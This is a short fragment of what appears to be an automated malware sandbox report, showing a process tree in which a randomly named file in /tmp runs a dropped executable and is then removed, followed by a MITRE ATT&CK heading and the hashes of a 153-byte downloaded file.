/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97